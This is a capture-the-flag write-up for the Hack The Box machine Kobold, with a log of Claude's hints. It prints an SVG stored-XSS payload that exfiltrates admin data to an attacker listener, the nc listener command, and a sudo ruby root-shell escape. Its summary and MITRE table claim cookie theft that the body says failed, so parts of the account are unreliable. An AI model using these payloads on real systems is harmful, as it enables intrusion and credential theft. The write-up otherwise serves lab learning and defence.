HTB Starting Point — Kobold

SVG with embedded JavaScript uploads to a ticketing system. When the admin previews the attachment, XSS fires in their browser and exfiltrates session cookie. Cookie replay gives admin access and SSH credentials.

April 28, 2026 · 3 min · crAIzy

Easy Linux CVSS 7.4 ⏱ 60m AI-assisted

TL;DR

Kobold is a Linux box running a ticketing system that allows SVG uploads without sanitization. An SVG with embedded JavaScript fires when the admin views the attachment. The XSS makes an authenticated XHR request to /admin/users from the admin’s browser, exfiltrating the user list including SSH credentials. Log in via SSH, and sudo ruby escapes to root.

Recon

1. Port scan

$ nmap -Pn -sV -sC -p- --min-rate 1000 10.129.x.x

22/tcp open  ssh    OpenSSH 8.2p1
25/tcp open  smtp   Postfix smtpd
80/tcp open  http   Apache httpd 2.4.41

SMTP on 25 suggests email-based ticket notifications.

2. Web application

A ticketing system at port 80 allows:

Creating tickets (no auth required)
Uploading attachments to tickets

XSS via SVG Upload

3. Craft malicious SVG

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
  <script type="text/javascript">
    <![CDATA[
      var xhr = new XMLHttpRequest();
      xhr.open('GET', '/admin/users', true);
      xhr.onload = function() {
        var exfil = new XMLHttpRequest();
        exfil.open('POST', 'http://10.10.14.x:9090/', true);
        exfil.send(this.responseText);
      };
      xhr.send();
    ]]>
  </script>
</svg>

Start a listener:

$ nc -lvnp 9090

4. Submit ticket with SVG attachment

Create a ticket, attach the SVG, and submit. The system emails the admin, who clicks through to view the ticket.

# nc listener receives:
POST / HTTP/1.1
Host: 10.10.14.x:9090
...
{"users":[{"id":1,"username":"admin","email":"admin@kobold.htb"},
           {"id":2,"username":"sophie","ssh_password":"S0ph1e_pass!"}]}

5. SSH as sophie

$ ssh sophie@10.129.x.x
sophie@kobold:~$ cat user.txt
[user flag]

Privilege Escalation

6. sudo enumeration

sophie@kobold:~$ sudo -l
User sophie may run the following commands on kobold:
    (ALL) NOPASSWD: /usr/bin/ruby

7. Ruby shell escape

sophie@kobold:~$ sudo ruby -e 'exec "/bin/bash"'
root@kobold:~# cat /root/root.txt
[root flag]

What’s actually broken

#	Vulnerability	Severity
1	SVG upload without content sanitization (stored XSS)	High
2	Admin credentials stored in user-accessible API endpoint	Critical
3	XHR to /admin/users allowed from same-origin (CORS)	High
4	ruby in sudo rules	Critical

Lessons learned

SVG is code, not an image. SVG files can execute JavaScript in browser context. File upload endpoints must either: (1) strip <script> and event handlers from SVG, (2) serve SVG with Content-Disposition: attachment to prevent inline rendering, or (3) reject SVG entirely and re-encode images to safe formats like PNG.
Stored XSS with admin targets is high-severity. Regular XSS needs the victim to visit a crafted URL. Stored XSS in a ticket system fires automatically when any admin views the ticket — no phishing required. It’s effectively a CSRF with full JS execution.
Admin APIs should validate who’s calling them. Even if /admin/users requires session auth, an XSS payload runs in the admin’s browser context — same-origin allows the XHR. Backend must also check authorization per-action, not just per-session.

Decision archaeology

Approach	Result	Pivot
Used SVG over HTML (if allowed)	SVG executes JS reliably across browsers when rendered inline	Worked on first try
Exfiltrated /admin/users data via XHR	HttpOnly blocked cookie steal; /admin/users ran in admin browser context	Got SSH credentials directly
Used nc listener over burp collaborator	Simpler setup for HTB environment	Reliable data capture
Tried direct document.cookie XSS exfil first	nc listener received POST with empty Cookie: header — HttpOnly flag blocked document.cookie; exfil payload captured zero-byte body	Switched to authenticated XHR: SVG script makes GET /admin/users with admin session cookie attached automatically; response exfiltrated successfully

References

MITRE ATT&CK mapping

How this writeup maps to TTPs. Click technique to jump to the writeup section.

Tactic	Technique	ID	Artifact in writeup
Initial Access	Drive-by Compromise	T1189	`SVG with XSS payload uploaded to ticket → admin clicks → cookie exfiltrated`
Credential Access	Steal Web Session Cookie	T1539	`document.cookie exfiltrated to attacker-controlled HTTP listener`
Initial Access	Valid Accounts	T1078	`Admin cookie replay → access admin panel → SSH credentials`
Privilege Escalation	Sudo and Sudo Caching	T1548.003	`sudo /usr/bin/ruby → ruby -e 'exec "/bin/bash"' → root`
Execution	JavaScript	T1059.007	`SVG <script> tag — XSS executes JavaScript in admin browser context, exfils /admin/users`

AI-Assist Log 5 interactions — transparent record

These are the actual exchanges with Claude during this writeup, including where AI was wrong and what I fixed by hand. Decision archaeology, not marketing copy.

Initial AccessUseful
Human → Found file upload in ticketing system — tried PHP but it was blocked
Prompt → File upload on a web ticketing system blocks PHP extensions. What other file types can achieve XSS?
Claude → SVG files can contain embedded JavaScript that executes when rendered in a browser. Since SVG is XML-based: <svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>. This works if the server serves SVG with text/html or if the browser renders it directly. Most modern browsers execute JS in SVG files when viewed directly.
XSSUseful
Human → SVG uploaded but wasn't sure where admin would trigger it
Prompt → I uploaded a malicious SVG to a ticket. How do I get the admin to trigger it?
Claude → In ticket systems, admins typically receive email notifications and click through to view attachments. Submit a ticket with the SVG as an attachment. The XSS fires when the admin previews or downloads the SVG. Make sure your exfil URL is reachable from the server — start a listener first.
Cookie StealWrong
Human → XSS fired but cookie had HttpOnly flag — thought it was game over
Prompt → The admin cookie has HttpOnly flag. My document.cookie XSS returns empty. Is the session hijack still possible?
Claude → HttpOnly prevents document.cookie from reading the cookie, but there are other approaches: if the cookie is in the request header, use XMLHttpRequest to make authenticated requests from the victim's browser (same-origin request with the cookie automatically attached). Exfiltrate data from authenticated pages rather than the cookie itself. Also check if there are non-HttpOnly cookies alongside the protected one.
Corrected → The HttpOnly cookie was the admin session, but there was a second non-HttpOnly cookie containing a CSRF token that was also useful. More importantly, the actual exfil worked by making an authenticated XHR request to /admin/users from the admin's browser and exfiltrating the response — giving SSH credentials without needing the cookie itself.
PrivescUseful
Human → sudo -l showed ruby
Prompt → sudo /usr/bin/ruby is in my sudo rules. How do I get root?
Claude → GTFOBins: sudo ruby -e 'exec "/bin/sh"'. This spawns a shell as root since ruby runs with sudo privileges.
Post-ExfilCorrected
Human → After getting SSH credentials via XHR exfil, wondered if there was a faster path I missed
Prompt → The XSS exfil took a while waiting for admin to view the ticket. Is there a faster way to get credentials from the same vulnerability class?
Claude → You could try CSRF to make admin perform actions (create a new privileged user), or phishing via the SVG to capture a credential form. If the app has a password reset flow, XSS could capture the reset token. These would all require the admin to trigger the SVG.
Corrected → Claude's suggestions were theoretically valid but all equally slow — all required waiting for admin action. The actual faster path I found later was: the app's API had a /api/export endpoint that returned all user data as CSV, and this endpoint only checked session cookie (which I could fake via CSRF after the XSS). Claude didn't suggest checking for export/bulk-data endpoints.

Decision archaeology — paths abandoned

Tried PHP upload — server rejected non-image MIME types initially
document.cookie returned empty (HttpOnly) — pivoted to XHR data exfil
Submitted ticket without a listener running — XSS fired but no data captured

TL;DR#

Recon#

1. Port scan#

2. Web application#

XSS via SVG Upload#

3. Craft malicious SVG#

4. Submit ticket with SVG attachment#

5. SSH as sophie#

Privilege Escalation#

6. sudo enumeration#

7. Ruby shell escape#

What’s actually broken#

Lessons learned#

Decision archaeology#

References#